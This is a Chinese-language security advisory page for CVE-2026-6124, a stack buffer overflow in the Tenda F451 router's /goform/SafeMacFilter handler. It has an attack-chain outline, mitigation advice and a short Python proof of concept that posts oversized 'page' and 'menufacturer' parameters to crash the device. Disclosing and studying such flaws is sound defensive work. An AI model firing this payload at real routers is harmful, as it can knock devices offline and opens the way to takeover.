IPBUF安全漏洞报告
English
CVE-2026-6124 CVSS 8.8 高危

CVE-2026-6124 Tenda F451路由器栈溢出漏洞

披露日期: 2026-04-12

漏洞信息

漏洞编号
CVE-2026-6124
漏洞类型
缓冲区溢出
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Tenda F451

相关标签

CVE-2026-6124缓冲区溢出Tenda F451RCEIoT安全远程代码执行

漏洞概述

Tenda F451路由器1.0.0.7版本存在高危栈溢出漏洞。漏洞源于/goform/SafeMacFilter接口的fromSafeMacFilter函数未正确过滤参数。攻击者可通过构造恶意的page或menufacturer参数,触发基于栈的缓冲区溢出。由于攻击可远程发起且无需交互,成功利用可能导致设备被完全控制,造成严重安全风险。

技术细节

该漏洞位于Tenda F451路由器的HTTP服务组件中,具体由/goform/SafeMacFilter路径下的fromSafeMacFilter函数处理逻辑缺陷引起。在处理用户请求时,程序直接对传入的page或menufacturer参数进行读取,并使用不安全的内存拷贝函数将其复制到栈上的局部变量缓冲区中。由于未对输入数据的长度进行边界检查,当参数长度超过缓冲区大小时,多余的数据将覆盖栈上的相邻内存,包括返回地址。攻击者通过网络发送特制的HTTP POST请求即可触发此漏洞。CVSS向量显示攻击复杂度低,无需用户交互且仅需低权限。成功利用该漏洞可导致拒绝服务或远程代码执行,攻击者可借此获得设备的最高控制权限,完全破坏系统的机密性、完整性和可用性。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,识别暴露的Tenda F451路由器设备及其Web管理接口。
STEP 2
2. 漏洞利用
攻击者构造包含超长page或menufacturer参数的恶意HTTP POST请求,发送至/goform/SafeMacFilter接口。
STEP 3
3. 触发溢出
路由器在处理请求时,fromSafeMacFilter函数因未检查边界发生栈缓冲区溢出,覆盖返回地址。
STEP 4
4. 执行代码
程序流程被劫持,攻击者注入的Shellcode被执行,从而获得设备的远程控制权或导致设备崩溃。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit_poc(target_ip): target_url = f"http://{target_ip}/goform/SafeMacFilter" # Construct payload to trigger stack overflow # Sending excessive length to page and menufacturer parameters payload = "A" * 1000 data = { "page": payload, "menufacturer": payload } try: print(f"Sending payload to {target_url}...") response = requests.post(target_url, data=data, timeout=5) print(f"Response status code: {response.status_code}") print("If the device crashes or becomes unresponsive, the vulnerability is confirmed.") except Exception as e: print(f"An error occurred: {e}") print("This might indicate a crash due to the buffer overflow.") if __name__ == "__main__": target = "192.168.0.1" # Replace with actual target IP exploit_poc(target)

影响范围

Tenda F451 1.0.0.7

防御指南

临时缓解措施
建议立即将路由器管理界面置于内网环境,避免暴露在公网。密切关注Tenda官方发布的固件更新,并在第一时间进行升级。若官方暂无补丁,建议暂时更换设备或限制对路由器Web管理界面的访问权限。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表